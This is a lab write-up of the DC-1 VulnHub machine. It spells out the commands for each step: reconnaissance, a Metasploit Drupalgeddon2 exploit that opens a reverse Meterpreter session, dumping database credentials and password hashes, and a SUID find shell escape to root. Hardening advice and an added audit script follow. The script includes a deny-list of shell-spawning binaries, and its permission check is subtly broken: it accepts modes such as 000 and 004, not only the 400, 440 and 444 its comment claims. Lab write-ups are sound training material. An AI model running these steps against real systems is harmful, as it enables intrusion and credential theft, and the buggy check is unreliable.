A complete walkthrough of the DC-1 VulnHub machine — from host discovery to root. Covers Drupalgeddon2 exploitation, credential extraction, and SUID privilege escalation.
Ran netdiscover on the host-only interface to find the target on the local network.
    netdiscover -i eth1

Full-port OS-detection scan to map the attack surface.

    nmap -p- -O 192.168.56.102

Version scan on the open ports revealed Apache 2.2.22, PHP 5.4, and a Drupal CMS fingerprint.

    nmap -sV -p22,80,111 192.168.56.102

Browsing to port 80 confirmed Drupal 7. Nikto surfaced exposed paths and misconfigurations.

    nikto -h http://192.168.56.102

Used the drupal_drupalgeddon2 Metasploit module to gain a Meterpreter session as www-data.

    use exploit/unix/webapp/drupal_drupalgeddon2
    set RHOSTS 192.168.56.102
    set LHOST 192.168.56.101
    run

Flag 1 hinted at the config file. Reading settings.php leaked the database credentials.

    cat sites/default/settings.php

Connected to the local MySQL instance and pulled the user password hashes from drupaldb.

    mysql -u dbuser -p
    use drupaldb;
    select * from users;

Flag 4 hinted at the vector used for the final escalation to root. The find binary had the SUID bit set, which allows spawning a shell as root.

    find /dev -name null -exec /bin/sh \;
    cat /root/thefinalflag.txt

CVE-2018-7600 — unauthenticated remote code execution on Drupal 7.x via the form API.
settings.php readable by web process — plaintext DB credentials leaked to attacker.
find binary with SUID bit allows any user to spawn a privileged shell as root.
Upgrade to a supported Drupal version. Drupal 7 has been end-of-life since January 2025.
Set strict file permissions on settings.php (440 or 444). It should never be readable by the web process in a way that exposes credentials.
Run find / -perm -4000 regularly. Remove SUID from non-essential binaries like find, vim, and nmap.
The DB user should have only the minimum required permissions — no shell, no file read, no admin rights.
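As an added example (not part of the original writeup), a small POSIX shell audit that implements the SUID and settings.php hardening checks above: it enumerates SUID files the way the find / -perm -4000 check does, flags the ones that can spawn a shell (the deny-list is an assumption), and verifies that settings.php is mode 400, 440 or 444. It assumes GNU coreutils (stat -c), as on the Debian-based box.

```shell
#!/bin/sh
# Added hardening-check helper, not code from the original DC-1 writeup.
# Assumes GNU stat (-c) and POSIX find.

# Binaries that should not carry SUID on a web server. The writeup abused
# find; the remaining shell-spawning candidates are an assumed deny-list.
RISKY_SUID="find vim vi nmap bash sh dash python perl less more awk"

# list_suid ROOT: print every regular file under ROOT with the SUID bit set
# (the same "find / -perm -4000" check the hardening note recommends).
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# flag_risky_suid ROOT: print "RISKY <path>" for each SUID file whose name is
# on the deny-list. Returns 1 if any were found, 0 if the tree is clean.
# Paths are assumed to contain no whitespace (word-splitting on $(...)).
flag_risky_suid() {
    found=0
    for f in $(list_suid "$1"); do
        name=$(basename "$f")
        for r in $RISKY_SUID; do
            if [ "$name" = "$r" ]; then
                echo "RISKY $f"
                found=1
            fi
        done
    done
    return $found
}

# settings_perms_ok FILE: succeed only when FILE is mode 400, 440 or 444,
# i.e. read-only, no write/execute bits, no setuid/setgid/sticky bits.
# Returns 2 if the file cannot be stat'ed.
settings_perms_ok() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 2
    case "$mode" in
        [04][04][04]) return 0 ;;
        *)            return 1 ;;
    esac
}

# Stand-alone use: sh audit.sh / /var/www/sites/default/settings.php
if [ $# -ge 1 ]; then
    flag_risky_suid "$1" && echo "no risky SUID binaries under $1"
    if [ $# -ge 2 ]; then
        settings_perms_ok "$2" && echo "$2 permissions ok" || echo "$2 too permissive"
    fi
fi
```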